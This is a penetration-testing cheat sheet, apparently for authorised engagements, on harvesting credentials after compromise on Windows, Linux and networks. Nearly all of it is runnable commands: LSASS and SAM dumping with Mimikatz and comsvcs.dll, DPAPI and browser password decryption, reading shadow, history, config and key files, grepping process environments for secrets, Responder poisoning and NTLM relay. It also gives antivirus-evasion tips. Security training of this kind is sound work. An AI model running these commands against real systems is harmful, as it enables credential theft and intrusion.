Credential Harvesting
After gaining access to a system, harvesting credentials is one of the highest-value post-exploitation activities. Found credentials enable lateral movement, privilege escalation, and access to additional systems.
# Set environment variables
export TARGET=<ip>
export DOMAIN=<domain>
export USER=<username>
export PASSWORD=<password>
export LHOST=<your-ip>
Windows Credential Harvesting
Mimikatz — LSASS Memory
LSASS (Local Security Authority Subsystem Service) caches NTLM hashes and Kerberos tickets for logged-in users. Requires Administrator access with SeDebugPrivilege.
Extract password hashes of all logged-in users:
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
Extract Kerberos tickets from memory:
sekurlsa::tickets /export
Elevate token to SYSTEM and dump SAM database:
token::elevate
lsadump::sam
If Mimikatz is blocked by AV, try: renaming the executable, using an encoded version, running it through an interactive logon (RDP) rather than WinRM, or using alternative tools like nanodump or pypykatz.
LSASS Memory Dump (Offline Extraction)
If you can't run Mimikatz on the target, dump LSASS memory and extract credentials offline.
Using Task Manager (requires GUI/RDP access): open Task Manager → Details tab → right-click lsass.exe → Create dump file.
Using comsvcs.dll (LOLBin approach):
# Find LSASS PID
tasklist /fi "imagename eq lsass.exe"
# Dump using rundll32
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass-pid> C:\Users\Public\lsass.dmp full
Transfer the dump to Kali and extract with pypykatz:
pypykatz lsa minidump lsass.dmp
Or use Mimikatz offline:
.\mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
SAM Database
The SAM database stores local user password hashes. It's located at C:\Windows\System32\config\SAM and is locked while Windows is running.
If you can access SAM and SYSTEM files (from backups, shadow copies, or registry saves):
Save registry hives (requires admin):
reg save HKLM\SAM C:\Users\Public\SAM
reg save HKLM\SYSTEM C:\Users\Public\SYSTEM
Extract hashes on Kali:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Common backup locations to check:
dir C:\Windows\Repair\
dir C:\Windows\System32\config\RegBack\
Secretsdump (Remote)
If you have admin credentials, dump everything remotely from Kali:
impacket-secretsdump $DOMAIN/$USER:$PASSWORD@$TARGET
impacket-secretsdump $DOMAIN/$USER@$TARGET -hashes 00000000000000000000000000000000:$HASH
This extracts: SAM hashes, LSA secrets, cached domain credentials, and NTDS.dit (if run against a domain controller).
DPAPI Credential Decryption
Windows Data Protection API (DPAPI) encrypts sensitive data including saved browser passwords, WiFi passwords, and credential manager entries. Each user has master keys that decrypt their protected data.
Decrypt DPAPI-protected credentials with Mimikatz:
.\mimikatz.exe
privilege::debug
# List credential files
dir C:\Users\$USER\AppData\Local\Microsoft\Credentials\
dir C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
# Decrypt a credential blob
dpapi::cred /in:C:\Users\$USER\AppData\Local\Microsoft\Credentials\<credential-file>
# The output shows the masterkey GUID needed — find and decrypt it
dpapi::masterkey /in:C:\Users\$USER\AppData\Roaming\Microsoft\Protect\<SID>\<masterkey-guid> /rpc
# Now decrypt the credential again with the masterkey
dpapi::cred /in:C:\Users\$USER\AppData\Local\Microsoft\Credentials\<credential-file>
Windows Credential Manager
cmdkey /list
If saved credentials exist, use them:
runas /savecred /user:$USER cmd.exe
Cached Domain Credentials
Windows caches the last 10 domain logon credentials by default (for offline logon). These are stored as MS-Cache v2 hashes.
Extract with Mimikatz:
.\mimikatz.exe
privilege::debug
lsadump::cache
Crack MS-Cache v2 hashes:
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt
MS-Cache v2 hashes are salted and computationally expensive to crack compared to NTLM. They cannot be used for pass-the-hash — they must be cracked to plaintext.
Browser Credentials
Chrome
Chrome stores passwords encrypted with DPAPI. SharpChrome can extract them:
.\SharpChrome.exe logins
Or use LaZagne:
.\LaZagne.exe browsers
Firefox
Firefox stores credentials in logins.json encrypted with a key in key4.db:
# From Kali, if you've copied the Firefox profile
firefox_decrypt /path/to/firefox/profile/
WiFi Passwords
List saved WiFi profiles:
netsh wlan show profiles
Extract the password for a specific profile:
netsh wlan show profile name="<network-name>" key=clear
Registry Autologon Credentials
Check for autologon credentials stored in the registry:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
VNC Passwords
VNC stores obfuscated (not truly encrypted) passwords in the registry:
reg query "HKCU\Software\TightVNC\Server" /v Password
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\RealVNC\vncserver" /v Password
Decrypt VNC passwords with known tools (the "encryption" is a fixed DES key).
Unattended Installation Files
Check for credentials in Windows deployment files:
type C:\Unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattend\Unattend.xml
type C:\Windows\system32\sysprep\sysprep.xml
type C:\Windows\system32\sysprep\Unattend.xml
Look for <Password> elements — they may contain base64-encoded plaintext passwords.
LaZagne (All-In-One)
LaZagne retrieves passwords stored by various applications:
.\LaZagne.exe all
Covers: browsers, mail clients, WiFi, sysadmin tools, databases, git, and more.
Linux Credential Harvesting
/etc/shadow
If readable (misconfiguration), contains password hashes for all local users:
cat /etc/shadow
Extract and crack:
# Copy the hash for the target user
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
History Files
Users frequently type passwords as arguments to commands or accidentally type them at shell prompts:
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.*history
history
Search all history files across the system:
find / -name ".*history" -exec cat {} \; 2>/dev/null
Configuration Files
Many services store credentials in plaintext config files:
# Web applications
cat /var/www/html/wp-config.php
cat /var/www/html/config.php
cat /var/www/html/.env
# Database configs
cat /etc/mysql/my.cnf
cat /etc/postgresql/*/main/pg_hba.conf
# Application configs
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.config" -exec grep -l "password" {} \; 2>/dev/null
find / -name ".env" -exec cat {} \; 2>/dev/null
# Tomcat users
cat /etc/tomcat*/tomcat-users.xml
cat /opt/tomcat/conf/tomcat-users.xml
SSH Keys
Find private keys that may grant access to other systems:
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
Check for keys with no passphrase (you can use them directly):
ssh-keygen -y -f /path/to/private_key
# If it doesn't prompt for a passphrase, the key is unprotected
Credential Files in Home Directories
# Generic credential files
find /home/ -name "*.txt" -exec grep -li "password\|passwd\|credential" {} \; 2>/dev/null
find /home/ -name ".pgpass" 2>/dev/null
find /home/ -name ".my.cnf" 2>/dev/null
find /home/ -name ".netrc" 2>/dev/null
# Password manager databases
find / -name "*.kdbx" -o -name "*.kdb" 2>/dev/null
# Git credentials
find / -name ".git-credentials" 2>/dev/null
GNOME Keyring
If the user is running a GNOME desktop, credentials may be stored in the keyring:
find / -name "*.keyring" 2>/dev/null
# Keyring files are in ~/.local/share/keyrings/
/proc Filesystem
Running processes may have credentials in their environment variables or command lines:
# Check environment variables of running processes
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i "pass\|key\|token\|secret"
# Check command lines
cat /proc/*/cmdline 2>/dev/null | tr '\0' ' ' | grep -i "pass\|key\|token"
LaZagne (Linux)
python3 laZagne.py all
Covers: browser passwords, WiFi, sysadmin tools, and more on Linux.
Network Credential Capture
Responder (LLMNR/NBT-NS Poisoning)
Responder poisons LLMNR and NBT-NS broadcast requests to capture NTLMv2 hashes on the local network:
sudo responder -I eth0 -dwPv
Captured hashes are saved to /usr/share/responder/logs/ and can be cracked:
hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
Responder is a passive attack — it only captures hashes when a client makes a failed name resolution request on the network. It's most effective on busy networks during working hours. Run it early in an engagement and let it collect hashes while you work on other things.
NTLM Relay (impacket-ntlmrelayx)
Instead of cracking captured hashes, relay them directly to another service:
# Disable SMB and HTTP in Responder first (edit /usr/share/responder/Responder.conf)
sudo responder -I eth0 -dwPv
# In another terminal, relay captured auth to a target
impacket-ntlmrelayx -tf targets.txt -smb2support
Successful relay can provide: shell access, SAM dump, or execution of commands on the target.
Credential Hunting Checklist
- Dump LSASS / SAM on every Windows machine you access
- Check PowerShell history files on every Windows machine
- Search for credential files in home directories and common application paths
- Check browser saved passwords
- Look for password manager databases (.kdbx)
- Check for autologon, VNC, and unattended install credentials in the registry
- On Linux, check history files, config files, and SSH keys
- Run Responder on the network to passively collect hashes
- Try discovered credentials against every other system and service (password reuse is extremely common)
- Keep a running credential list — add every username and password you find